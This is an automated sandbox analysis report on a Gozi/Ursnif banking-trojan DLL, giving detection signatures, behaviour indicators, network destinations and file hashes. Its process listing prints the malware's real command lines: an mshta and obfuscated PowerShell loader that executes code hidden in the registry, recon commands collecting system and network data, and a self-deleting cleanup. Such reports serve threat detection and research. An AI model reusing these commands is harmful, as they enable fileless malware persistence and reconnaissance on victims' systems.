Analysis Overview
SHA256
b1d0b5b4ce535cdbf0b8fbd21c8583fbade52436da55fbb7c1d4c75d47eca75c
Threat Level: Known bad
The file 04447a2725f293f8a9746b0db58fa832 was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
Blocklisted process makes network request
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Gathers system information
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
Runs ping.exe
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Runs net.exe
Discovers systems in the same network
Enumerates processes with tasklist
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-06-14 08:59
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2022-06-14 08:59
Reported
2022-06-14 09:01
Platform
win10v2004-20220414-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Gozi, Gozi IFSB
suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3884 set thread context of 2408 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 2408 set thread context of 3464 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2408 set thread context of 3236 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\cmd.exe |
| PID 2408 set thread context of 3860 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2408 set thread context of 4396 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3236 set thread context of 2092 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\PING.EXE |
| PID 2408 set thread context of 3832 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\04447a2725f293f8a9746b0db58fa832.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\04447a2725f293f8a9746b0db58fa832.dll,#1
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ac2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ac2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\10AAFBA1-2FF6-C22D-3944-D3167DB8B7AA\\\ManagerPack'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name kmjerqocyu -value gp; new-alias -name yscpdhrj -value iex; yscpdhrj ([System.Text.Encoding]::ASCII.GetString((kmjerqocyu "HKCU:Software\AppDataLow\Software\Microsoft\10AAFBA1-2FF6-C22D-3944-D3167DB8B7AA").GameStop))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\piuulr1n\piuulr1n.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB89D.tmp" "c:\Users\Admin\AppData\Local\Temp\piuulr1n\CSCD3EC1ADFC1F647C8B5851D916681784E.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bp41bbro\bp41bbro.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB987.tmp" "c:\Users\Admin\AppData\Local\Temp\bp41bbro\CSCD4710BF84F9547F2878282E3E653B730.TMP"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\04447a2725f293f8a9746b0db58fa832.dll"
C:\Windows\system32\PING.EXE
ping localhost -n 5
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 13.89.178.26:443 | | tcp |
| US | 8.253.208.112:80 | | tcp |
| US | 8.253.208.112:80 | | tcp |
| US | 8.253.208.112:80 | | tcp |
| US | 13.107.43.16:80 | config.edge.skype.com | tcp |
| DE | 194.76.226.15:80 | 194.76.226.15 | tcp |
| IQ | 5.42.199.72:80 | 5.42.199.72 | tcp |
| US | 8.8.8.8:53 | xmhomestilesh.at | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files
memory/2592-130-0x0000000000000000-mapping.dmp
memory/2592-131-0x0000000000400000-0x000000000046F000-memory.dmp
memory/2592-133-0x0000000001500000-0x0000000001506000-memory.dmp
memory/2592-134-0x0000000002FE0000-0x0000000002FED000-memory.dmp
memory/3884-138-0x0000000000000000-mapping.dmp
memory/3884-139-0x0000019B1E140000-0x0000019B1E162000-memory.dmp
memory/3884-140-0x00007FFAC5060000-0x00007FFAC5B21000-memory.dmp
memory/2980-141-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\piuulr1n\piuulr1n.cmdline
| MD5 | 2c3fa395cdb41b7d4cc1f04c408e56ce |
| SHA1 | eefe7d748e8d11c7b49f080e87a937b8ef3da5c3 |
| SHA256 | 5d5982dd9d4b5617c963c5b1ea7a63475f95d21979e9c82a56f198695c305ae1 |
| SHA512 | d503a9f75cf9ed7c01448ad6b6f2502ff9734becdd7f0009ef60a5738cf5a6011659c1d07d6d3beaa35db6df05920ef20de5caa30ce667f4ae91e0a7f97c2d7d |
\??\c:\Users\Admin\AppData\Local\Temp\piuulr1n\piuulr1n.0.cs
| MD5 | f820213893ae01ec4cfea63472d9bee7 |
| SHA1 | 3f52e992772d4b98f56666d6c018d33c8499f8fb |
| SHA256 | 320df24e318288a7c53091fcf36ba34e2717e520d504e46d0c60538b04928c9b |
| SHA512 | 1e9fd857a3c6ffd7d6b291b156656b2c6983617849941e3901519703e4cb126c1f31d9233459fc0792acc985642b85772f03d1aa7f9de387d0b5fbf641bc26fe |
memory/3720-144-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\piuulr1n\CSCD3EC1ADFC1F647C8B5851D916681784E.TMP
| MD5 | 2601ae284f6ee6012fbc0c8aaaa02f79 |
| SHA1 | 511d770eaee0ebb406ec5b490596629724f9f039 |
| SHA256 | 7dd6148f9981b73198e0a89f56df79ba174ff295666ba04a4a9d975bebfd1793 |
| SHA512 | 035fbd2d2bc27e2d3f4d1a184f24738a68ee5fc1d2a3e7fb06b572efcd06d02d6e247027fc4954721300490986109c192c5e5e39df0859523f5e7b3756cfdb3f |
C:\Users\Admin\AppData\Local\Temp\RESB89D.tmp
| MD5 | 660b278715b6749fec4c7bb81e9896d3 |
| SHA1 | e46ba48ef4415e0c7179f627cea19c40feacaca1 |
| SHA256 | 04c0b579551e3596efe60473ffdd2c0e2d1733a5c4b959568de25cba4c8b76c9 |
| SHA512 | ebb66d28beb44c7e758ee32b32d0c556a1d14f29afba71a007fbdf3cd70b11c2c70dd86133b93578c7980b899003f147fdd911bc3d26792e7d9d7e9f99c85499 |
C:\Users\Admin\AppData\Local\Temp\piuulr1n\piuulr1n.dll
| MD5 | fb760ec07b8a7717882aadd2e5350632 |
| SHA1 | c69e3766d30849d79389a7d453242992990d6a37 |
| SHA256 | e2d3675b45cee6596bcbeebe2a5ea7eab8c5391a96bc915ab192e88af0b2bc34 |
| SHA512 | aba9cb449d86ea066ee4f5093fdeca16d123633f6d24b9eb6182637d9189046c75acde82c656d1add5063291a652a55462ca3d6ab121d6d1cc91a2a82f4073e3 |
memory/2132-148-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\bp41bbro\bp41bbro.cmdline
| MD5 | bbf03c1fea0a2452f4c93762cd844bca |
| SHA1 | 6c274bb02c4e6a532e75e815a1b582b9b5f1cd3f |
| SHA256 | 00e4b9866f20c8c88c60b3ceb41488329b9db43a310e71f9327c0adb7787f8d1 |
| SHA512 | 95b9692093c21f4aa595fa6693557715c4b23c34e4060a6d4ff2782d092b266902eb678ada8ce62f780af9ea39cff210c71b84333d1a5a387662f7e91367f349 |
\??\c:\Users\Admin\AppData\Local\Temp\bp41bbro\bp41bbro.0.cs
| MD5 | 0077218343b3a9ec4b12f1fd77ef52dc |
| SHA1 | 0b8e186a73e6403d5a1476ec828f338019ba5c9e |
| SHA256 | 83736f1996108f1f4ec03e27b8ecd278547bb2539ed7fe43ee81a9530c40befa |
| SHA512 | e02e64b413e176a985ea54746a01e9bf4c5ae57bca87e3ae6f670b9c12ddafa5bb9282029d53a9393cd5dbce8889002e054f5d14611baa5bd3aefd0ed381db9e |
memory/1836-151-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\bp41bbro\CSCD4710BF84F9547F2878282E3E653B730.TMP
| MD5 | 08a93a4db50358411fc112826b47ab92 |
| SHA1 | 27c7db569cacefa2dd28bb5152f1df60a6603960 |
| SHA256 | ecd74efb0c4b9d8b7ecb004fffe4bb1d6bdc838921ce573a675cc7f0218a0c31 |
| SHA512 | 262f6eb7d52f35da97d4a80e8360d55d84ad1d627de2fe18dfa7559cb97aeb5b1ef062ee83017e9fcdb9eb0e0be7b01997385d78454c8283df90e4db4bac4da8 |
C:\Users\Admin\AppData\Local\Temp\RESB987.tmp
| MD5 | 9e5c82fc009360d0d3866a4379e38f99 |
| SHA1 | 1f94abf5d6c39bdf3e2eff868885949bc0ea326a |
| SHA256 | f80c63eefad1e5f71f4f7ae05e0615bd57b5ed63d724b95bc6cc30cd9980eaf7 |
| SHA512 | 360a0c05385f7d6bd71f34087ab812aca0fc3c2a50ff78d6e313afa0b20594e623d64e976bc9a3c5944a49504c523d5372bb047e2fa4d9cab75b54b277ecd86b |
C:\Users\Admin\AppData\Local\Temp\bp41bbro\bp41bbro.dll
| MD5 | 3792202dfd8f7908330ff8ac7e66fb50 |
| SHA1 | 74cc53b201de44b6db1ab55da47dbfb8dc038b19 |
| SHA256 | 46213ec44853a6dee88329f23102a41e3434db1a668d6b221198824ca44e82fc |
| SHA512 | 7d6c7d08711f98633a23eb32a90de4db7eea18ed6c588eb09a710dddc195a4126f05155a58dcb5ff907d40f36b278d9624fe278728e7717323cea01d51d4d7a4 |
memory/3884-155-0x00007FFAC5060000-0x00007FFAC5B21000-memory.dmp
memory/3884-156-0x0000019B38950000-0x0000019B3898D000-memory.dmp
memory/3236-157-0x0000000000000000-mapping.dmp
memory/3464-158-0x00000159AA060000-0x00000159AA103000-memory.dmp
memory/3236-159-0x000001C308FA0000-0x000001C309043000-memory.dmp
memory/2408-160-0x0000000007880000-0x0000000007923000-memory.dmp
memory/2092-161-0x0000000000000000-mapping.dmp
memory/1740-162-0x0000000000000000-mapping.dmp
memory/4316-163-0x0000000000000000-mapping.dmp
memory/3832-164-0x0000000000000000-mapping.dmp
memory/3860-165-0x0000019C3BAE0000-0x0000019C3BB83000-memory.dmp
memory/4396-166-0x000002C9C6A60000-0x000002C9C6B03000-memory.dmp
memory/2092-167-0x0000025976D30000-0x0000025976DD3000-memory.dmp
memory/3832-169-0x0000000000466B20-0x0000000000466B24-memory.dmp
memory/2408-168-0x0000000009C90000-0x0000000009DCB000-memory.dmp
memory/3832-173-0x0000000001250000-0x00000000012E6000-memory.dmp
memory/2408-174-0x0000000009AE0000-0x0000000009C1A000-memory.dmp
memory/3236-178-0x000001C308FA0000-0x000001C309043000-memory.dmp
memory/2408-179-0x0000000007880000-0x0000000007923000-memory.dmp
memory/2504-180-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 26af7d777fd98ac93b685d57580a1150 |
| SHA1 | 10d5ba39244172ad89717a2b0778798df83b3095 |
| SHA256 | 7146ce4006cb5ed9f84b2ee544dc768c3157437b091e33efd1a492059dcd4c21 |
| SHA512 | 75a12c5e790d61854665f26659f94fda31b17780810167c34f98eb30f306686d3112de7c4e92c768153e6b36adf60d42f805e267cd8541de9cb325936d479c1c |
memory/4172-182-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 26af7d777fd98ac93b685d57580a1150 |
| SHA1 | 10d5ba39244172ad89717a2b0778798df83b3095 |
| SHA256 | 7146ce4006cb5ed9f84b2ee544dc768c3157437b091e33efd1a492059dcd4c21 |
| SHA512 | 75a12c5e790d61854665f26659f94fda31b17780810167c34f98eb30f306686d3112de7c4e92c768153e6b36adf60d42f805e267cd8541de9cb325936d479c1c |
memory/1632-184-0x0000000000000000-mapping.dmp
memory/3096-185-0x0000000000000000-mapping.dmp
memory/432-186-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 605ed0d3e69bfa29831a5229268e70a7 |
| SHA1 | 29d36b842b459671b3eacd2a0059b6b9f81214e1 |
| SHA256 | 461946bd34740c9620fee8c1260fad1ed783184df14c1e602a533d8f9e65dc5c |
| SHA512 | 954b1ac369e1f46db3ea2b777f4b28d6920ce99273638f8daf16d219ccb7f3705343ad59f83daa6d48163d92510c53d199b80eb23bc7c72db4a070ddf8365529 |
memory/4284-188-0x0000000000000000-mapping.dmp
memory/2688-189-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 687ed54c481c3d741d199a55984880bf |
| SHA1 | d929b88426f90eb65c4558846f54c8d9c49e1d19 |
| SHA256 | c7e1d0236da832665e4e47aca78bdbf49feaf8c3056f0fb2d35d316bee80a2f9 |
| SHA512 | 32c14d028716827b7427e3614e848b85d8f37809f4b066faddf12565539d508d463069fee4a2fc3ed78c0c3ad856adba182414331a9c45ada2637976ca57e183 |
memory/2348-191-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 687ed54c481c3d741d199a55984880bf |
| SHA1 | d929b88426f90eb65c4558846f54c8d9c49e1d19 |
| SHA256 | c7e1d0236da832665e4e47aca78bdbf49feaf8c3056f0fb2d35d316bee80a2f9 |
| SHA512 | 32c14d028716827b7427e3614e848b85d8f37809f4b066faddf12565539d508d463069fee4a2fc3ed78c0c3ad856adba182414331a9c45ada2637976ca57e183 |
memory/2196-193-0x0000000000000000-mapping.dmp
memory/4200-194-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 510f930e916d8fcb9026f0413db39411 |
| SHA1 | 305b9efd077d84f6c8c46b42da875b641e2bd099 |
| SHA256 | 5474fc334d755523abb7f593a829a41ab7ca08c175d7c6bf7e6070aec471f14a |
| SHA512 | e745b8de841409693154d144b5c85a5440f0876cdb3367fb40ea90148a52076c9b161db7c1d9152c5b9ed0abdc43b7644daaa1ba55a9820ebe80cb3bccf25ee3 |
memory/1604-196-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 510f930e916d8fcb9026f0413db39411 |
| SHA1 | 305b9efd077d84f6c8c46b42da875b641e2bd099 |
| SHA256 | 5474fc334d755523abb7f593a829a41ab7ca08c175d7c6bf7e6070aec471f14a |
| SHA512 | e745b8de841409693154d144b5c85a5440f0876cdb3367fb40ea90148a52076c9b161db7c1d9152c5b9ed0abdc43b7644daaa1ba55a9820ebe80cb3bccf25ee3 |
memory/2192-198-0x0000000000000000-mapping.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2022-06-14 08:59
Reported
2022-06-14 09:01
Platform
win7-20220414-en
Max time kernel
36s
Max time network
39s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\04447a2725f293f8a9746b0db58fa832.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\04447a2725f293f8a9746b0db58fa832.dll,#1
Network
Files
memory/1796-54-0x0000000000000000-mapping.dmp
memory/1796-55-0x0000000075951000-0x0000000075953000-memory.dmp
memory/1796-56-0x00000000001E0000-0x000000000024F000-memory.dmp
memory/1796-57-0x00000000001E0000-0x000000000024F000-memory.dmp
memory/1796-59-0x0000000000100000-0x0000000000106000-memory.dmp
memory/1796-60-0x0000000000360000-0x000000000036D000-memory.dmp